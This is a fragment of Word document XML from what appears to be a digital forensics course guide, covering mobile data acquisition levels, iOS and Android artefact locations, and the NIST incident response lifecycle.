        <w:t xml:space="preserve">Levels of acquisition</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4191"/>
        <w:gridCol w:w="3411"/>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Level</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="419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is obtained</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Manual</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="419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Operating the phone and photographing screens</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Only visible data; used only as a last resort</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Logical</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="419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Asks the phone (through backup or APIs) for its data</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Contacts, messages, call logs, media, some app data — </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">not deleted data</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File system</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="419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Gets the whole file-system structure and databases</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App databases, system files, some deleted records inside databases</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Physical</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="419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Bit-by-bit copy of flash memory</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Everything, including deleted data (hardest to obtain on modern encrypted devices)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Chip-off / JTAG</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="419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Hardware methods: remove the memory chip or use test points</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Used for damaged or locked devices; destructive or technical; rarely works on strongly encrypted modern phones</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0E7C7B"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">iOS vs Android</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42"/>
        <w:gridCol w:w="3752"/>
        <w:gridCol w:w="3752"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
          <w:tblHeader/>
        </w:trPr>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Aspect</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="375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iOS (iPhone/iPad)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="375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Android</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Ecosystem</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="37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Closed; Apple makes both hardware and software; few models</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="37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Open; hundreds of manufacturers and versions (fragmentation); each device may need a different method</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Encryption</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="375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Always on; strongly tied to the passcode and a hardware Secure Enclave; very hard to bypass without passcode</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="375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Full-disk or file-based encryption on modern versions; strength varies by maker and version</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Common acquisition</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="37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Logical via </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">iTunes/Finder backup</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">; file-system extraction using specialised tools for supported models; </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">iCloud</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> data with legal process</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="37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Logical via </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">ADB</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> (needs USB debugging enabled); file-system or physical via manufacturer/bootloader/rooting methods; </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Google account</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> backups with legal process</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Main obstacles</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="375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Passcode lock, frequent updates closing exploits, limited access to the file system</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="375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Different chipsets, locked bootloaders, encryption, rooting changes the device</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Typical tools</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="37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Cellebrite UFED, Magnet AXIOM/GrayKey-type tools, libimobiledevice, iTunes backups</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="375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Cellebrite UFED, Magnet AXIOM, Oxygen, MSAB XRY, ADB</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0E7C7B"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Common mobile artefacts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3655"/>
        <w:gridCol w:w="3654"/>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Artefact</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="365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Android (typical location)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="36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iOS (typical location)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SMS/iMessage</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3655"/>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/data/data/com.android.providers.telephony/databases/mmssms.db</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="365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/private/var/mobile/Library/SMS/sms.db</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Calls</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3655"/>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calllog.db</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> / contacts provider</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="365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CallHistory.storedata</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Contacts</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3655"/>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contacts2.db</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="365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AddressBook.sqlitedb</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WhatsApp chats</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3655"/>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msgstore.db</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> (under the app’s data folder; backups are encrypted)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="365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ChatStorage.sqlite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Photos / media</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3655"/>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DCIM</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> folder; EXIF data (time, GPS, device)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="365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Photos.sqlite</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">; DCIM</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Location &amp; Wi-Fi</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="36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Google location history, Wi-Fi configuration files</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="36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Significant locations/cache databases, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="7A1F1F"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">known networks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Browser, app usage, installed apps</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="36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Chrome databases, app data in </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="7A1F1F"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">/data/data/&lt;package&gt;/</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="36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Safari history, app containers, usage databases</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Remember</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="280"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Most mobile artefacts are </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">SQLite databases</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">. Deleted messages can sometimes be recovered from unused parts of the database file or its journal (WAL) file. Time formats vary (Unix, Cocoa/Apple epoch from 2001, WebKit) and must be converted carefully.</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V — Incident Response, Malware Forensics &amp; Reporting</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
        <w:spacing w:after="160" w:before="340"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">5.1 Incident Response — Introduction</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security incident</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is an event that harms, or threatens to harm, the confidentiality, integrity or availability of information or systems — for example a malware infection, ransomware, a phishing compromise, unauthorised access, or data theft. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Incident Response (IR)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is the organised process of detecting, analysing, containing, removing and recovering from incidents, and learning from them.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The aims of IR are not only to stop the attack. They are also to understand what happened, limit the damage, preserve evidence, restore normal service and prevent a repeat.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="dxa" w:w="9746"/>
        <w:tblBorders>
          <w:top w:val="single" w:color="6A3D9A" w:sz="6"/>
          <w:left w:val="single" w:color="6A3D9A" w:sz="6"/>
          <w:bottom w:val="single" w:color="6A3D9A" w:sz="6"/>
          <w:right w:val="single" w:color="6A3D9A" w:sz="6"/>
          <w:insideH w:val="none" w:color="FFFFFF" w:sz="0"/>
          <w:insideV w:val="none" w:color="FFFFFF" w:sz="0"/>
        </w:tblBorders>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9746"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="false"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="9746"/>
            <w:shd w:fill="F3ECF8" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="150"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="150"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:keepNext/>
              <w:spacing w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="6A3D9A"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">↔ Incident Response vs Digital Forensics</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="70" w:line="280"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Incident response</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> is about </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">controlling</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> an incident quickly: stop the attacker, protect the business, restore services. Its question is </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:i/>
                <w:iCs/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">“How do we stop this and get back to normal?”</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="70" w:line="280"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Digital forensics</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> is about </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">understanding and proving</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> what happened using preserved evidence. Its question is </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:i/>
                <w:iCs/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">“What exactly happened, and what can we prove?”</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="280"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">They work together: IR provides speed and containment; forensics provides evidence and depth. The challenge is that fast containment (wiping, reinstalling, rebooting) can destroy evidence — so the two teams must coordinate.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
        <w:spacing w:after="160" w:before="340"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">5.2 NIST SP 800-61 — The Incident Response Lifecycle</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National Institute of Standards and Technology (NIST)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> publishes </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Special Publication 800-61, the Computer Security Incident Handling Guide</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, the most widely used IR framework. It describes the lifecycle as a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">cycle</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: lessons learned at the end feed back into preparation. Your syllabus lists six steps, with </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Containment, Eradication and Recovery</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> shown separately (the original publication groups them in one phase).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0E7C7B"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">■ NIST incident response lifecycle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rPr>
          <w:cantSplit/>
        </w:trPr>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1. Preparation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2. Detection &amp; Analysis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3. Containment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4. Eradication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5. Recovery</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6. Post-Incident Activity</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Note on versions</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="280"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">The classic model above comes from NIST SP 800-61 Revision 2. NIST has since published Revision 3 (2025), which aligns incident response with the functions of the NIST Cybersecurity Framework 2.0. For your exam, answer using the phases given in your syllabus.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0E7C7B"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Phase 1 — Preparation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Preparation means building the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">people, process and technology</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> needed to respond </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">before</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> an incident. Good preparation reduces confusion and response time.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
